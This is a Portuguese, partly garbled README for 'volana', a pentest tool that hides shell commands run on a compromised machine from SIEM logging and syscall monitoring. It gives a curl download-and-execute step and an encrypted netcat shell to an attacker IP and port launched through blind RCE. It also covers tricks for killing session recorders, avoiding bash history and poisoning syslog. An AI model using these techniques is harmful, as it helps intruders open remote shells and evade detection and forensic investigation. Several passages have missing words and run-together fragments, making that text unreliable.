
🌒 Ofuscação de comandos shell para evitar sistemas de detecção
{ Usar ; 🌚(esconder de); 🌞(detectado por) } Durante um pentest, um aspecto importante é ser furtivo. Por esta razão, você deve . No entanto, muitas infraestruturas registram comandos e os enviam para um SIEM em tempo real, tornando a limpeza posterior inútil. fornece uma maneira simples de esconder comandos executados na máquina comprometida, fornecendo seu próprio runtime de shell (digite seu comando, volana executa por você). Dessa forma, você
volanaVocê precisa obter um shell interativo. (Encontre uma maneira de gerá-lo, você é um hacker, é seu trabalho! caso contrário). Em seguida, faça o download na máquina alvo e execute. É isso, agora você pode digitar o comando que deseja executar furtivamente
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana » [command]
Palavras-chave para o console volana:
ring: ativar modo anel, ou seja, cada comando é lançado com vários outros para encobrir rastros (de soluções que monitoram chamadas de sistema)exit: sair do console volanaImagine que você tenha um shell não interativo (webshell ou rce cega). Você pode usar os subcomandos encrypt e decrypt. Anteriormente, você precisa compilar volana com uma chave de criptografia embutida.
Na máquina do atacante
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it on TARGET (the unique detectable command)
## [...]
## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
Copie o comando criptografado e execute-o com seu rce na máquina alvo
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)
Por que não esconder o comando com echo [command] | base64? E decodificar no alvo com echo [encoded_command] | base64 -d | bash
Porque queremos estar protegidos contra sistemas que disparam alertas para o uso de base64 ou que procuram texto base64 no comando. Além disso, queremos dificultar a investigação e o base64 não é uma barreira real.
Tenha em mente que volana não é um milagre que o tornará totalmente invisível. Seu objetivo é tornar a detecção de intrusão e a investigação mais difíceis.
Apenas a linha de comando de inicialização do volana será capturada. 🧠 No entanto, adicionando um espaço antes de executá-lo, o comportamento padrão do bash é não salvá-lo
.bash_history, ".zsh_history" etc ..opensnoop)script, screen -L, sexonthebash, ovh-ttyrec, etc..)
pkill -9 scriptscreen é um pouco mais difícil de evitar, no entanto, ele não registra a entrada (entrada secreta: stty -echo => evitar)volana com criptografia/var/log/auth.log)
sudo ou sulogger -p auth.info "No hacker is poisoning your syslog solution, don't worry")LD_PRELOAD para registrar
Desculpe pelo título clickbait, mas nenhum dinheiro será fornecido para contribuidores. 🐛
Informe-me se você encontrou:
volanavolana